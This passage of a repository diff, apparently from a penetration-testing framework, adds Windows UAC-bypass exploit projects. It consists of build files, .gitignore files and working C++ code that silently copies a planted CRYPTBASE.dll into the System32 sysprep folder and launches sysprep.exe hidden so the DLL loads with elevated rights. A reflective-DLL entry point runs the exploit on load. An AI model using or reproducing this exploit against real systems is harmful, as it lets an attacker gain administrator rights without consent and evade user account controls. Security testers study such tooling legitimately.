<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<GenerateManifest>false</GenerateManifest>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<GenerateManifest>false</GenerateManifest>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
@@ -90,11 +99,16 @@
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<MinimalRebuild>false</MinimalRebuild>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
@@ -102,11 +116,16 @@
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<MinimalRebuild>false</MinimalRebuild>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.2 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
@@ -117,6 +136,7 @@
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@@ -124,6 +144,9 @@
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
@@ -134,6 +157,7 @@
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@@ -145,6 +169,9 @@
<Path>
</Path>
</BuildLog>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.2 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="stdafx.h" />
external/source/exploits/bypassuac/Win7ElevateDll/dllmain.cpp
Vendored Regular → Executable
-3
View File
@@ -17,7 +17,6 @@ BOOL APIENTRY DllMain( HMODULE hModule,
// Wee need to hide fact that we've started process thats why we immediately
// Terminate host application.
//
CLogger::LogLine(TEXT("DLL: Hello"));
switch (ul_reason_for_call)
{
@@ -33,8 +32,6 @@ BOOL APIENTRY DllMain( HMODULE hModule,
startupInfo.cb = sizeof(startupInfo);
PROCESS_INFORMATION processInfo = {0};
CLogger::LogLine(TEXT("DLL: TIOR shell="));
CLogger::LogLine(cmd);
//
// Create not visible window
external/source/exploits/bypassuac/make.msbuild
Vendored Executable
+19
View File
@@ -0,0 +1,19 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\Win7Elevate.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86;x64" />
<Target Name="x86">
<Message Text="Building bypassuac x86" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="Building bypassuac x64" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
</Target>
</Project>
external/source/exploits/bypassuac/x64/.keep
Vendored
View File
external/source/exploits/bypassuac_injection/.gitignore
+151
View File
@@ -0,0 +1,151 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
x64/
build/
[Bb]in/
[Oo]bj/
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
!packages/*/build/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.log
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile
# Visual Studio profiler
*.psess
*.vsp
*.vspx
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
*.ncrunch*
.*crunch*.local.xml
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.Publish.xml
*.pubxml
# NuGet Packages Directory
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
# =========================
# Windows detritus
# =========================
# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store
external/source/exploits/bypassuac_injection/bypassuac_injection.sln
Vendored Executable
+28
View File
@@ -0,0 +1,28 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "bypassuac", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Debug|x64 = Debug|x64
Release|Win32 = Release|Win32
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
external/source/exploits/bypassuac_injection/dll/reflective_dll.vcxproj
Vendored
+204
View File
@@ -0,0 +1,204 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}</ProjectGuid>
<RootNamespace>reflective_dll</RootNamespace>
<Keyword>Win32Proj</Keyword>
<ProjectName>bypassuac</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>11.0.50727.1</_ProjectFileVersion>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<OutDir>$(SolutionDir)$(Configuration)\</OutDir>
<IntDir>$(Configuration)\</IntDir>
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<IntDir>$(Platform)\$(Configuration)\</IntDir>
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<OutDir>$(SolutionDir)$(Configuration)\</OutDir>
<IntDir>$(Configuration)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<TargetName>$(ProjectName)-x86</TargetName>
<IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<OutDir>$(SolutionDir)$(Configuration)\</OutDir>
<IntDir>$(Configuration)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<TargetName>$(ProjectName)-x64</TargetName>
<IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\;</IncludePath>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX64</TargetMachine>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>
IF EXIST "..\..\..\..\..\data\post\" GOTO COPY
mkdir "..\..\..\..\..\data\post\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\post\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>true</IntrinsicFunctions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PreprocessorDefinitions>WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>CompileAsCpp</CompileAs>
</ClCompile>
<Link>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>
IF EXIST "..\..\..\..\..\data\post\" GOTO COPY
mkdir "..\..\..\..\..\data\post\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\post\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="src\Exploit.cpp" />
<ClCompile Include="src\ReflectiveDll.c" />
<ClCompile Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="src\Exploit.h" />
<ClInclude Include="..\..\..\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" />
<ClInclude Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp
Vendored
+119
View File
@@ -0,0 +1,119 @@
#include "Exploit.h"
void exploit()
{
const wchar_t *szSysPrepDir = L"\\System32\\sysprep\\";
const wchar_t *szSysPrepDir_syswow64 = L"\\Sysnative\\sysprep\\";
const wchar_t *sySysPrepExe = L"sysprep.exe";
const wchar_t *szElevDll = L"CRYPTBASE.dll";
const wchar_t *szSourceDll = L"CRYPTBASE.dll";
wchar_t szElevDir[MAX_PATH] = {};
wchar_t szElevDir_syswow64[MAX_PATH] = {};
wchar_t szElevDllFull[MAX_PATH] = {};
wchar_t szElevDllFull_syswow64[MAX_PATH] = {};
wchar_t szElevExeFull[MAX_PATH] = {};
wchar_t path[MAX_PATH] = {};
wchar_t windir[MAX_PATH] = {};
const wchar_t *szElevArgs = L"";
const wchar_t *szEIFOMoniker = NULL;
PVOID OldValue = NULL;
IFileOperation *pFileOp = NULL;
IShellItem *pSHISource = 0;
IShellItem *pSHIDestination = 0;
IShellItem *pSHIDelete = 0;
const IID *pIID_EIFO = &__uuidof(IFileOperation);
const IID *pIID_EIFOClass = &__uuidof(FileOperation);
const IID *pIID_ShellItem2 = &__uuidof(IShellItem2);
GetWindowsDirectoryW(windir, MAX_PATH);
GetTempPathW(MAX_PATH, path);
/* %temp%\cryptbase.dll */
wcscat_s(path, MAX_PATH, szSourceDll);
/* %windir%\System32\sysprep\ */
wcscat_s(szElevDir, MAX_PATH, windir);
wcscat_s(szElevDir, MAX_PATH, szSysPrepDir);
/* %windir%\sysnative\sysprep\ */
wcscat_s(szElevDir_syswow64, MAX_PATH, windir);
wcscat_s(szElevDir_syswow64, MAX_PATH, szSysPrepDir_syswow64);
/* %windir\system32\sysprep\cryptbase.dll */
wcscat_s(szElevDllFull, MAX_PATH, szElevDir);
wcscat_s(szElevDllFull, MAX_PATH, szElevDll);
/* %windir\sysnative\sysprep\cryptbase.dll */
wcscat_s(szElevDllFull_syswow64, MAX_PATH, szElevDir_syswow64);
wcscat_s(szElevDllFull_syswow64, MAX_PATH, szElevDll);
/* %windir%\system32\sysprep\sysprep.exe */
wcscat_s(szElevExeFull, MAX_PATH, szElevDir);
wcscat_s(szElevExeFull, MAX_PATH, sySysPrepExe);
if (CoInitialize(NULL) == S_OK)
{
if (CoCreateInstance(*pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, *pIID_EIFO, (void**) &pFileOp) == S_OK)
{
if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) == S_OK)
{
if (SHCreateItemFromParsingName((PCWSTR) path, NULL, *pIID_ShellItem2, (void**) &pSHISource) == S_OK)
{
if (SHCreateItemFromParsingName(szElevDir, NULL, *pIID_ShellItem2, (void**) &pSHIDestination) == S_OK)
{
if (pFileOp->CopyItem(pSHISource, pSHIDestination, szElevDll, NULL) == S_OK)
{
/* Copy the DLL file to the sysprep folder*/
if (pFileOp->PerformOperations() == S_OK)
{
/* Execute sysprep.exe */
SHELLEXECUTEINFOW shinfo;
ZeroMemory(&shinfo, sizeof(shinfo));
shinfo.cbSize = sizeof(shinfo);
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
shinfo.lpFile = szElevExeFull;
shinfo.lpParameters = szElevArgs;
shinfo.lpDirectory = szElevDir;
shinfo.nShow = SW_HIDE;
Wow64DisableWow64FsRedirection(&OldValue);
if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
{
WaitForSingleObject(shinfo.hProcess, 10000);
CloseHandle(shinfo.hProcess);
}
if (S_OK == SHCreateItemFromParsingName(szElevDllFull, NULL, *pIID_ShellItem2, (void**)&pSHIDelete))
{
if (0 != pSHIDelete)
{
if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
{
pFileOp->PerformOperations();
// If we fail to delete the file probably SYSWOW64 process so use SYSNATIVE to get the correct path
// DisableWOW64Redirect fails at this? Possibly due to how it interacts with UAC see:
// http://msdn.microsoft.com/en-us/library/windows/desktop/aa384187(v=vs.85).aspx
if (S_OK == SHCreateItemFromParsingName(szElevDllFull_syswow64, NULL, *pIID_ShellItem2, (void**)&pSHIDelete))
{
if (0 != pSHIDelete)
{
if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
{
pFileOp->PerformOperations();
}
}
}
}
}
}
}
}
}
}
}
}
}
}
external/source/exploits/bypassuac_injection/dll/src/Exploit.h
Vendored
+8
View File
@@ -0,0 +1,8 @@
#include <Windows.h>
#include <commctrl.h>
#include <shlobj.h>
#include <Shellapi.h>
#include <stdio.h>
#include <guiddef.h>
EXTERN_C void exploit();
external/source/exploits/bypassuac_injection/dll/src/ReflectiveDll.c
Vendored
+26
View File
@@ -0,0 +1,26 @@
#include "ReflectiveLoader.h"
#include "Exploit.h"
extern HINSTANCE hAppInstance;
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
exploit();
ExitProcess(0);
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
external/source/exploits/bypassuac_injection/make.bat
Vendored
+38
View File
@@ -0,0 +1,38 @@
@ECHO OFF
IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
IF "%1"=="x86" GOTO BUILD_X86
IF "%1"=="X86" GOTO BUILD_X86
IF "%1"=="x64" GOTO BUILD_X64
IF "%1"=="X64" GOTO BUILD_X64
ECHO "Building Exploits x64 and x86 (Release)"
SET PLAT=all
GOTO RUN
:BUILD_X86
ECHO "Building Exploits x86 (Release)"
SET PLAT=x86
GOTO RUN
:BUILD_X64
ECHO "Building Exploits x64 (Release)"
SET PLAT=x64
GOTO RUN
:RUN
ECHO "Building Bypass UAC Injection"
msbuild.exe make.msbuild /target:%PLAT%
FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
echo Finished %ldt%
GOTO :END
:NEED_VS
ECHO "This command must be executed from within a Visual Studio Command prompt."
ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
:END
external/source/exploits/bypassuac_injection/make.msbuild
Vendored
+19
View File
@@ -0,0 +1,19 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\bypassuac_injection.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86;x64" />
<Target Name="x86">
<Message Text="Building Bypass UAC (Injection) Release version x86" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="Building Bypass UAC (Injection) Release version x64" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
</Target>
</Project>
external/source/exploits/cve-2013-3881/.gitignore
+151
View File
@@ -0,0 +1,151 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
x64/
build/
[Bb]in/
[Oo]bj/
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
!packages/*/build/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.log
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile
# Visual Studio profiler
*.psess
*.vsp
*.vspx
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
*.ncrunch*
.*crunch*.local.xml
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.Publish.xml
*.pubxml
# NuGet Packages Directory
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
# =========================
# Windows detritus
# =========================
